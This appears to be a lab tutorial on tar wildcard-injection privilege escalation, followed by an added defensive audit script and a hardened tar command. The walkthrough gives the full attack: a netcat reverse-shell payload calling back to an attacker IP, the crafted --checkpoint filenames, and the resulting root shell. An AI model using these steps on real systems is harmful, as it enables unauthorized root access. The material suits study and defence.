Wildcard Injection

Concept

Wildcard injection is a privilege escalation technique that abuses how shell wildcards (*) expand to filenames. If a privileged script (like a cron job) runs a command such as:

tar -zxf file.tar.gz *

...and we control the directory it's run in, we can create files with names like:

  • --checkpoint=1

  • --checkpoint-action=exec=sh shell.sh

These are interpreted by tar as command-line options, not regular files. This lets us inject malicious behavior — like running our own script as root — when the privileged tar command executes.

[ You control a writable dir ] 

[ Cron runs: tar -zxf backup.tar.gz * ]

[ You create fake files named as tar options ]

* expands to:
    --checkpoint=1
    --checkpoint-action=exec=sh shell.sh

[ tar executes your shell.sh as root ]

Example

We can use pspy or manually enumerate the target host:

# Enumerate running processes
$ ./pspy
...
2025/05/24 20:46:01 CMD: UID=0     PID=30275  | /bin/bash -c cd /opt/admin && tar -zxf /tmp/backup.tar.gz *

# Manually enumerate cron jobs
$ cat /etc/cron.d/2minutes
...
*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *

The 2minutes cron job runs every two minutes as root and extracts the backup.tar.gz tarball from the /tmp directory into the /opt/admin directory, passing a wildcard (*) as the member list. If we have write access to the target directory (/opt/admin), we can perform a wildcard injection:

# Check the target directory's permissions
$ ls -ld /opt/admin
drwxr-xr-x 2 cassie cassie 4096 Nov  2  2022 /opt/admin
# Generate a reverse shell payload command on the attacking host
$  msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.X.154 LPORT=443 R
...
mkfifo /tmp/bhksuw; nc 192.168.X.154 443 0</tmp/bhksuw | /bin/sh >/tmp/bhksuw 2>&1; rm /tmp/bhksuw

In order for this to work, we must create both the --checkpoint files and the payload script (shell.sh) within the target directory (/opt/admin) before the cron job runs. This makes the * expand to those filenames, effectively injecting the checkpoint options into tar:

# Move into the target directory
$ cd /opt/admin

# Create the reverse shell script
$ echo "mkfifo /tmp/bhksuw; nc 192.168.X.154 443 0</tmp/bhksuw | /bin/bash >/tmp/bhksuw 2>&1; rm /tmp/bhksuw" > shell.sh

# Assign execute permissions to the script
$ chmod +x shell.sh

# Create a checkpoint action that executes the script
$ touch -- "--checkpoint-action=exec=sh shell.sh"

# Create the checkpoint trigger
$ touch -- "--checkpoint=1"

# Create an empty tarball within the /tmp directory
$ tar -czf /tmp/backup.tar.gz --files-from=/dev/null

# Confirm that everything is in place
$ ls -l
total 4
-rw-r--r-- 1 cassie cassie   0 May 25 09:35 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 cassie cassie   0 May 25 09:35 --checkpoint=1
-rwxr-xr-x 1 cassie cassie 102 May 25 09:35 shell.sh

$ ls -l /tmp/back*
-rw-r--r-- 1 cassie cassie 45 May 25 09:44 /tmp/backup.tar.gz

After two minutes:

# Catch the reverse shell
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.X.154] from (UNKNOWN) [192.168.X.157] 44664
id
uid=0(root) gid=0(root) groups=0(root)
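A defender-side counterpart to the procedure above, added here as an example (this is not code from the original page): a shell audit that reproduces the cron job's "cd DIR && tar ... *" expansion to flag option-like filenames before the job runs, beside the hardened form of the tar command. /opt/admin in the usage comment is the page's directory; the temp-directory inputs in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): a pre-flight audit for the
# directory a privileged `cd DIR && tar -zxf ARCHIVE *` job runs in, plus the
# hardened form of that command. Directory names passed in are assumptions.

# Mimic `cd "$1" && cmd *` and print every expanded word that tar would parse
# as an option (a leading '-'). No output means the glob is safe right now.
option_like_names() {
    ( cd "$1" || exit 1
      for name in *; do
          [ -e "$name" ] || continue   # an empty dir leaves a literal '*'
          case $name in -*) printf '%s\n' "$name" ;; esac
      done )
}

# Exit 0 when the directory holds no option-like names, 1 otherwise.
audit_dir() {
    [ -z "$(option_like_names "$1")" ]
}

# Words the hardened glob hands to tar: every one starts with './', so a
# crafted filename can only ever be a member name, never an option.
safe_words() {
    ( cd "$1" || exit 1
      for w in ./*; do
          [ -e "$w" ] || continue
          printf '%s\n' "$w"
      done )
}

# Hardened extraction: '--' ends option parsing and './*' replaces the bare '*'.
# tar still reports members missing from the archive, but it never sees a
# --checkpoint-action argument and therefore runs nothing.
safe_extract() {
    ( cd "$1" && tar -zxf "$2" -- ./* )
}

# Run as: sh audit.sh /opt/admin   (the cron job's working directory)
if [ -n "$1" ]; then
    option_like_names "$1"
    if audit_dir "$1"; then
        echo "ok: no option-like filenames in $1"
    else
        echo "WARNING: option-like filenames in $1" >&2
    fi
fi
```

Scheduling the audit just before the privileged job (or replacing the job's command with safe_extract) closes the window the page relies on; it does not remove the need to fix the directory permissions shown by ls -ld.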
